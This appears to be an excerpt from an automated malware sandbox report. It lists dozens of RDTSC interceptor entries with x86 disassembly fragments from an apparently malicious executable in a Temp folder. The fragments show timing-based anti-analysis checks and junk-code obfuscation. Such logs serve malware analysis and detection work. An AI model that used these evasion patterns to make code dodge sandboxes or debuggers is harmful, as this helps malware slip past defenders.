Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF47AA second address: CF47AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF47AE second address: CF47CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F58F53CD399h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF47CD second address: CF47D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4B9B second address: CF4BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFE417 second address: CFE42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F58F4C2897Dh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFE42E second address: CFE434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFD4E4 second address: CFD4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFD4E8 second address: CFD51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F58F53CD386h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F58F53CD38Bh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push ecx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F58F53CD393h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFD51F second address: CFD523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFD523 second address: CFD54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F58F53CD386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F58F53CD396h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFD7E2 second address: CFD7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFDCB4 second address: CFDCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFDE1A second address: CFDE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFDE1E second address: CFDE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFDE2A second address: CFDE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F58F4C28976h 0x0000000a popad 0x0000000b jmp 00007F58F4C28980h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFE154 second address: CFE158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFE158 second address: CFE17E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F58F4C28976h 0x00000008 jmp 00007F58F4C28984h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CFE17E second address: CFE1A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F58F53CD394h 0x00000010 pop ebx 0x00000011 jo 00007F58F53CD38Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC0DF0 second address: CC0E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007F58F4C28976h 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F58F4C28978h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov ecx, 1718AAEFh 0x00000036 lea eax, dword ptr [ebp+12481BD3h] 0x0000003c nop 0x0000003d jmp 00007F58F4C28987h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F58F4C28984h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC0E5E second address: CA76B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, CBCCh 0x0000000d mov di, E1C3h 0x00000011 call dword ptr [ebp+12459843h] 0x00000017 jbe 00007F58F53CD3A9h 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F58F53CD397h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC0EF5 second address: CC0F1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F58F4C28980h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jo 00007F58F4C28976h 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC1496 second address: CC14B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F58F53CD397h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC14B7 second address: CC14BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC14FE second address: CC1504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC1504 second address: CC1508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC1508 second address: CC154F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F53CD38Ah 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 stc 0x00000014 pop ecx 0x00000015 mov edi, dword ptr [ebp+122D1A87h] 0x0000001b push eax 0x0000001c ja 00007F58F53CD3A4h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F58F53CD38Ch 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC161D second address: CC1634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F58F4C2897Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC1634 second address: CC163E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F58F53CD386h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC1F23 second address: CC1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D01BCA second address: D01BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D01BD0 second address: D01BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D0219B second address: D0219F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89F80 second address: C89F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C2897Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D09AA8 second address: D09AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D09AB1 second address: D09ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28985h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D09FD5 second address: D09FE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D09FE3 second address: D09FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D0A3D3 second address: D0A3E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D0AB0C second address: D0AB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D0E9ED second address: D0E9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D0EB82 second address: D0EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F58F4C28976h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D11247 second address: D1124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1124D second address: D11258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D11258 second address: D1127C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F58F53CD395h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10DDE second address: D10E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28981h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F4C28989h 0x00000011 jno 00007F58F4C28976h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10F4F second address: D10F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10F55 second address: D10F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10F59 second address: D10F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD395h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F58F53CD388h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 jg 00007F58F53CD386h 0x0000001a js 00007F58F53CD386h 0x00000020 jg 00007F58F53CD386h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10F94 second address: D10F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F58F4C28976h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B00 second address: D17B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B06 second address: D17B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B11 second address: D17B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B15 second address: D17B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7ACBC second address: C7ACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7ACC2 second address: C7AD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 jmp 00007F58F4C28981h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F58F4C28982h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7AD02 second address: C7AD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7AD08 second address: C7AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16B86 second address: D16BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F58F53CD38Dh 0x0000000c jmp 00007F58F53CD38Bh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jnl 00007F58F53CD386h 0x0000001c pop edi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16BB4 second address: D16BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F58F4C28976h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16BC1 second address: D16BDE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F53CD398h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC19E8 second address: CC1AA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F58F4C2897Fh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F58F4C28978h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sbb ch, FFFFFFC6h 0x0000002b mov ebx, dword ptr [ebp+12481C12h] 0x00000031 add ecx, dword ptr [ebp+122D2C07h] 0x00000037 add eax, ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F58F4C28978h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 nop 0x00000054 jmp 00007F58F4C2897Eh 0x00000059 push eax 0x0000005a pushad 0x0000005b jnp 00007F58F4C2897Ch 0x00000061 jmp 00007F58F4C28987h 0x00000066 popad 0x00000067 nop 0x00000068 sub dword ptr [ebp+122D1ED0h], ecx 0x0000006e push 00000004h 0x00000070 sub cl, FFFFFFC1h 0x00000073 xor dword ptr [ebp+122D29C0h], esi 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jng 00007F58F4C28978h 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16D47 second address: D16D4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16D4F second address: D16D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F58F4C28976h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16E95 second address: D16E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16E9B second address: D16EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F637 second address: D1F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F63B second address: D1F63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F63F second address: D1F659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD394h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F659 second address: D1F67E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F58F4C28988h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F58F4C28976h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1E985 second address: D1E98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F58F53CD386h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EAD7 second address: D1EADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EADB second address: D1EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EAE9 second address: D1EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28980h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1AB second address: D1F1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
